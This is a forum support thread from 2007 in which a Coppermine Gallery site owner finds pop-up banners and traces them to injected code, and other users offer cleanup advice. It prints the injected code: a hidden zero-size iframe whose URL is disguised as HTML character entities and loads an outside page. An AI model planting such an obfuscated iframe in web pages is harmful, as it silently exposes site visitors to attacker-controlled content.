Site show not my pop-up banners

igor-msk · June 12, 2007, 02:03:14 AM

My site www.ilchenko.ru start show pop-up banners. I dont khow why! Help me! How to disable strange banners?

ps. Its payed hosting. I dont use popup_control plugin.

Nibbler · June 12, 2007, 02:27:47 AM

Upload a clean copy of index.php and check your webspace for malicious scripts.

igor-msk · June 12, 2007, 03:11:16 AM

I find in the bottom of index.php this code:

Code Select

<iframe 
src="&#104&#116&#116&#112&#58&#47&#47&#109&#105&#108&#108&#97&#45&#109&#111&#100&#101&#108&#46&#104&#117&#116&#50&#46&#114&#117&#47&#105&#110&#100&#101&#120&#46&#104&#116&#109&#108" width="0" height="0" style="display:none"></iframe>

I remove code and banners disappeared.

How to avoid this problem in future?

superdave · June 12, 2007, 09:34:16 AM

Quote from: Nibbler on June 12, 2007, 02:27:47 AM
Upload a clean copy of index.php and check your webspace for malicious scripts.

i'm having a similar problem. on my site, sometimes opening displayimage.php renders a popup to domain0.com

i replaced displayimage.php, but it's still happening. i replaced index.php, but that didn't help either.

i've looked through numerous pages and can't find the iframe code that igor posted.

not being an expert at this stuff, i have looked through the folders and can't find anything that looks malicious ... but i may have overlooked it, since i really don't know what i should be looking for.

http://www.super-dave.com/cpgallery is my site. intermediate images sometimes render a popup. it happens about every 3rd or 4th time.

any advice??

superdave · June 12, 2007, 09:42:53 AM

update to my previous post. i uninstalled a couple of plugins, but that didn't help either.

then i noticed something quite interesting. when i logged in as administrator, i couldn't replicate the popup page. then i logged out and looked at an intermediate image and i got the popup again!

Nibbler · June 12, 2007, 12:31:31 PM

@superdave: That is the popup_control plugin. If you don't want it don't use it. Please don't hijack other people's threads.

@igor-msk:

You are using the latest version of Coppermine which does not have any known vulnerabilities. Check any other scripts you are using are up to date, and see if your host will help you investigate.

superdave · June 12, 2007, 02:23:20 PM

Quote from: Nibbler on June 12, 2007, 12:31:31 PM
@superdave: That is the popup_control plugin. If you don't want it don't use it. Please don't hijack other people's threads.

oh. sorry. genuinely, sorry!

i searched for information, hoping that someone had the same problem as me. i didn't realise that this was different.

i'll search again, if i can't find someone with a similar problem, i'll post a new topic ...

thanks nibbler!

superdave · June 12, 2007, 07:54:25 PM

sorry for posting again nibbler, you said this thread is about the popup control plugin,

Quote from: Nibbler on June 12, 2007, 12:31:31 PM
@superdave: That is the popup_control plugin. If you don't want it don't use it. Please don't hijack other people's threads.

but igor said he's not using the popup control plugin

Quote from: igor-msk on June 12, 2007, 02:03:14 AMps. Its payed hosting. I dont use popup_control plugin.

he posted in cpg1.4 miscellaneous, not in the plugins forum ...

actually, another person has a similar problem http://forum.coppermine-gallery.net/index.php?topic=30630.0
and i'm far from an expert, but if there are no vulnerabilities in cpg 1.4.10, then igor needs to check his paid hosting to make sure he isn't the victim of a server hack, rather than a cpg hack.

again, i'm sorry for threadjacking ...

Nibbler · June 12, 2007, 08:36:49 PM

You are using the popup control plugin, Igor is not. That is why you are hijacking the thread. Please stop.

coppermine-gallery.com/forum

News:

Site show not my pop-up banners

igor-msk

Nibbler

igor-msk

superdave

superdave

Nibbler

superdave

superdave

Nibbler